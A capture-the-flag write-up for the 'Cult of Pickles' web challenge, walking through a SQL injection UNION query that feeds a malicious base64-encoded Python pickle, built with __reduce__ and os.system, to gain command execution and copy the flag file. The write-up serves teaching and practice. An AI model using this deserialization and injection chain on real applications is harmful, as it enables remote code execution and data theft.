C.O.P 🟡
Description
The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!
The source code of the page was provided.
Challenge
The /view/1 URL is vulnerable to SQL. The data from that gets un-base64 and un-pickled, we can exploit that to submit our own malicious pickle using the class __reduce__ method.
We want to move the flag.txt file to a location we can access, the static folder is ok:
class Payload:
def __reduce__(self):
import os
return (os.system, ('cp flag.txt application/static/flag.txt',))
print(base64.b64encode(pickle.dumps(Payload())))
This gives us: gASVQgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjCdjcCBmbGFnLnR4dCBhcHBsaWNhdGlvbi9zdGF0aWMvZmxhZy50eHSUhZRSlC4=
From here we can chain a SQLi with UNION to pass this pickle (URL encode if necessary):
' UNION SELECT '<our_pickle>' --%20
And boom we get a broken webpage, from there we just have to navigate to /static/flag.txt to get the flag.